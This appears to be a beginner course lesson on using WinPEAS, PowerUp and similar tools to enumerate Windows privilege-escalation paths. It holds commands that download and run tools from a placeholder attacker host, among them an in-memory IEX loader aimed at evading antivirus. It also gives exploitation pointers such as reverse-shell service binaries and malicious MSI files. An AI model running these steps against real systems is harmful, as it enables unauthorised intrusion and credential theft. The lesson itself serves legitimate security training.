WinPEAS & Automated Tools

beginner25 minWriteup

Using WinPEAS and other automation tools

Learning Objectives

  • Use WinPEAS effectively
  • Interpret WinPEAS output
  • Use PowerUp and other tools
  • Prioritize findings

WinPEAS (Windows Privilege Escalation Awesome Scripts) is the go-to automated enumeration tool for Windows. It checks hundreds of potential privilege escalation vectors and highlights what's interesting. Think of it as having an expert pentester scanning the system for you.

After

, WinPEAS fills in the gaps and catches things you might miss. But don't just blindly run it - understand what it's looking for so you can interpret the output.

AV Detection

WinPEAS is flagged by most antivirus software. You may need to use obfuscation, disable AV (if possible), or use alternative methods like the .bat version which is less detected.

Getting WinPEAS

bash
1606070;"># WinPEAS is part of the PEASS-ng suite
2606070;"># Download from: https://github.com/carlospolop/PEASS-ng
3 
4606070;"># Versions available:
5606070;"># winPEASx64.exe  - 64-bit executable
6606070;"># winPEASx86.exe  - 32-bit executable
7606070;"># winPEAS.bat     - Batch file (less features, more evasive)
8606070;"># winPEAS.ps1     - PowerShell version
9 
10606070;"># On attack machine, host for transfer:
11python3 -m http.server 80
12 
13606070;"># On target:
14certutil -urlcache -f http:606070;">//ATTACKER/winPEASx64.exe winpeas.exe
15606070;"># Or
16powershell -c 606070;">#a5d6ff;">"(New-Object Net.WebClient).DownloadFile('http://ATTACKER/winPEASx64.exe','C:\temp\winpeas.exe')"
17606070;"># Or
18iwr http:606070;">//ATTACKER/winPEASx64.exe -OutFile winpeas.exe

Version Matching

Use winPEASx64.exe on 64-bit systems and winPEASx86.exe on 32-bit. Running the wrong version may miss checks or fail to run. Check with: echo %PROCESSOR_ARCHITECTURE%

Running WinPEAS

batch
1REM Basic run (all checks)
2.winpeas.exe
3 
4REM Run with color output (easier to read)
5.winpeas.exe log
6 
7REM Save output to file
8.winpeas.exe > winpeas_output.txt
9 
10REM Run specific checks only
11.winpeas.exe quiet                  REM Minimal output
12.winpeas.exe systeminfo             REM System info only
13.winpeas.exe userinfo               REM User info only
14.winpeas.exe servicesinfo           REM Services only
15.winpeas.exe applicationsinfo       REM Applications only
16.winpeas.exe networkinfo            REM Network only
17.winpeas.exe windowscreds           REM Credential searches
18.winpeas.exe browserinfo            REM Browser data
19.winpeas.exe filesinfo              REM Interesting files
20 
21REM Combine specific checks
22.winpeas.exe systeminfo servicesinfo windowscreds

Handling AV/EDR

batch
1REM If .exe is blocked, try the batch version
2.winPEAS.bat
3 
4REM Or use PowerShell version (may trigger AMSI)
5powershell -ep bypass
6.winPEAS.ps1
7 
8REM Or run directly in memory (bypass disk-based detection)
9powershell -ep bypass -c 606070;">#a5d6ff;">"IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/winPEAS.ps1')"
10 
11REM Obfuscated versions may help
12REM Check recent releases for AMSI bypass versions

Reading WinPEAS Output

1WinPEAS Color Coding:
2├── RED/Yellow - Critical findings, likely exploitable
3├── Cyan       - Interesting but needs investigation
4├── Green      - Potentially useful information
5├── White      - Standard information
6└── Gray       - Less relevant details
7 
8Key Sections to Focus On:
9├── Basic System Information
10│   └── OS version, patches, architecture
11├── Users Information
12│   └── Current privileges, group memberships
13├── Services Information
14│   └── Unquoted paths, weak permissions
15├── Applications Information
16│   └── Installed software, update status
17├── Network Information
18│   └── Open ports, connections
19├── Windows Credentials
20│   └── Saved creds, cached logons
21├── Browser Information
22│   └── Saved passwords in browsers
23└── Interesting Files
24    └── Password files, configs, keys

Critical Findings to Watch For

1High-Priority WinPEAS Findings:
2 
3PRIVILEGES:
4[!] SeImpersonatePrivilege is enabled!
5→ Potato attacks possible (JuicyPotato, PrintSpoofer)
6 
7[!] SeBackupPrivilege is enabled!
8→ Can copy SAM/SYSTEM, extract hashes
9 
10SERVICES:
11[!] Unquoted service path: C:Program FilesMy Appservice.exe
12→ Potential unquoted path exploitation
13 
14[!] Service with weak permissions
15→ Modify service binary or config
16 
17[!] Service running as LocalSystem
18→ Exploiting this service = SYSTEM
19 
20REGISTRY:
21[!] AlwaysInstallElevated is set
22→ Install MSI as SYSTEM
23 
24[!] AutoLogon credentials found
25→ DefaultPassword in plaintext
26 
27CREDENTIALS:
28[!] Credential found in [file/registry]
29→ Potential password reuse
30 
31FILES:
32[!] Password found in config file
33→ May work for other accounts

Common WinPEAS Checks

1What WinPEAS Checks (Partial List):
2 
3System:
4├── Windows version and patch level
5├── AMSI and Defender status
6├── UAC settings
7├── PowerShell history
8└── Environment variables
9 
10Users:
11├── Current user privileges
12├── Group memberships
13├── Other users on system
14├── Recently logged users
15└── Clipboard content
16 
17Services:
18├── Non-standard services
19├── Unquoted service paths
20├── Modifiable service binaries
21├── Modifiable service configs
22└── Service account passwords
23 
24Applications:
25├── Installed software versions
26├── Running processes
27├── Scheduled tasks
28├── Startup applications
29└── Recently installed updates
30 
31Network:
32├── Network interfaces
33├── Listening ports
34├── Established connections
35├── Shares and mapped drives
36└── Cached DNS
37 
38Credentials:
39├── Windows Vault
40├── DPAPI masterkeys
41├── WiFi passwords
42├── Cloud credentials
43├── Cached credentials
44└── SAM/SYSTEM backup access
45 
46Files:
47├── Unattend.xml files
48├── web.config files
49├── Configuration files with passwords
50├── SSH keys
51├── KeePass databases
52└── History files

Alternative Tools

powershell
1606070;"># PowerUp (PowerShell)
2Import-Module .PowerUp.ps1
3Invoke-AllChecks
4606070;"># More focused on common escalation vectors
5 
6606070;"># Seatbelt (C# - comprehensive)
7.Seatbelt.exe -group=all
8606070;"># Extremely thorough, good for internal assessments
9 
10606070;"># Watson (C# - patch analysis)
11.Watson.exe
12606070;"># Focuses on missing patches/CVEs
13 
14606070;"># Sherlock (PowerShell - older but still useful)
15Import-Module .Sherlock.ps1
16Find-AllVulns
17606070;"># Checks for specific CVEs
18 
19606070;"># PrivescCheck (PowerShell)
20Import-Module .PrivescCheck.ps1
21Invoke-PrivescCheck
22606070;"># Good alternative to WinPEAS

Use Multiple Tools

Different tools catch different things. Run WinPEAS first, then PowerUp for a second opinion. Some vectors may be missed by one tool but caught by another.

Interpreting Results

1Example WinPEAS Output Analysis:
2 
3Finding: SeImpersonatePrivilege enabled
4What it means: Can impersonate tokens
5Exploitation: JuicyPotato, PrintSpoofer, RoguePotato
6Next step: Check Windows version for compatible exploit
7 
8Finding: Unquoted Service Path
9C:Program FilesVulnerable AppService.exe
10What it means: Service path not quoted, spaces present
11Exploitation: Place malicious .exe in writable directory
12Next step: Check if any parent directory is writable
13 
14Finding: Modifiable Service Binary
15What it means: Can replace the service executable
16Exploitation: Replace with reverse shell, restart service
17Next step: Generate payload, check restart permissions
18 
19Finding: AlwaysInstallElevated = 1
20What it means: Any user can install MSI as SYSTEM
21Exploitation: Create malicious MSI package
22Next step: msfvenom to generate MSI, install it
23 
24Finding: DefaultPassword in registry
25What it means: AutoLogon enabled with stored password
26Exploitation: Password may work elsewhere
27Next step: Try password for admin accounts, SSH, shares

WinPEAS Methodology

WinPEAS Workflow

1
TransferGet WinPEAS to target (correct architecture)
2
RunExecute with output redirection if possible
3
ReviewLook for RED/Yellow highlighted findings
4
PrioritizeFocus on: privileges, services, credentials
5
VerifyManually confirm exploitable conditions
6
ExploitUse appropriate technique for finding

Knowledge Check

Quick Quiz
Question 1 of 3

What color indicates critical findings in WinPEAS output?

Challenges

Run WinPEAS

Challenge
🌱 beginner

Transfer WinPEAS to a Windows target, run it, and identify at least three potential privilege escalation vectors from the output.

Need a hint? (4 available)

Key Takeaways

  • WinPEAS automates comprehensive privilege escalation checks
  • Red/Yellow output indicates critical, likely exploitable findings
  • Use .bat version if .exe is blocked by AV
  • Focus on: privileges, services, registry, credentials
  • Always manually verify findings before exploitation
  • Combine with PowerUp and other tools for complete coverage